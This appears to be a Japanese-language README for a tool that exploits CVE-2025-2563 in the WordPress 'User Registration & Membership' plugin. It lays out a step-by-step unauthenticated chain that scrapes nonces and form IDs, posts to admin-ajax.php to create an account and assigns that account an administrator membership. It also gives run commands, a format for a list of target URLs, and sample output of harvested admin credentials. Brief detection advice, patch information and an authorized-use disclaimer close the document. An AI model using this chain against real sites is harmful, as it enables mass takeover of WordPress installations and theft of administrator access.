
CVE-2025-2563
██╗ ██╗███████╗███████╗██████╗ ██████╗ ███████╗ ██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔══██╗██╔════╝██╔════╝ ██║ ██║███████╗█████╗ ██████╔╝ ██████╔╝█████╗ ██║ ███╗ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══██╗██╔══╝ ██║ ██║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ██║███████╗╚██████╔╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝
CVE-2025-2563 — WordPress用のUser Registration & Membershipプラグインを介した未認証の権限昇格 フルチェーンエクスプロイト: 匿名登録 → メンバーシップnonce悪用 → 管理者ロール乗っ取り
| フィールド | 詳細 |
|---|---|
| CVE | CVE-2025-2563 |
| プラグイン | User Registration & Membership |
| 影響を受けるバージョン | ≤ 4.1.1 |
| 種類 | 未認証の権限昇格 |
| CVSS | 重大 |
| ベクトル | ネットワーク / 認証不要 |
| WordPress | プラグインを実行している任意のバージョン |
[1] Crawl target
↓
[2] Fetch /membership-pricing/ & /membership-registration/
↓
[3] Extract form_id, membership_id, security nonce, ur_frontend_form_nonce
↓
[4] POST to /wp-admin/admin-ajax.php
action=user_registration_user_form_submit
→ Create arbitrary user account (unauthenticated)
↓
[5] Abuse membership JS nonce via ur_membership_frontend_localized_data
→ Assign administrator-level membership plan to new account
↓
[6] Verify admin access at /wp-admin/users.php & /wp-admin/plugin-install.php
↓
[7] Save credentials → NATA_admin.txt
form_id × membership_id × nonce の組み合わせを試行wp-admin アクセスを確認NATA_admin.txt に、登録は reg.txt に保存pip install requests rich
# 1. Add targets to list.txt (one URL per line)
# 2. Run
python CVE-2025-2563.py
入力: list.txt
https://target1.com
https://target2.com
https://target3.com
出力: NATA_admin.txt
[2025-04-20 08:00:00] https://target.com/wp-login.php user:natxploit_abc pass:NATA_adminSA
| ファイル | 内容 |
|---|---|
NATA_admin.txt | 確認された管理者認証情報 |
reg.txt | すべての成功した登録 |
以下を監視:
/wp-admin/admin-ajax.php への繰り返しのPOST(action=user_registration_user_form_submit)/membership-registration/ へのリクエストの直後のAJAXメンバーシップ割り当てパッチ: User Registration & Membership プラグインをバージョン >= 4.1.2 に更新
このツールは許可されたペネトレーションテストおよびセキュリティ研究のみのために公開されています。 作者は誤用に対する責任を負いません。テスト前に必ず明示的な書面による許可を得てください。
Natan Utama — github.com/dokter69 | Telegram: @ayasyanaro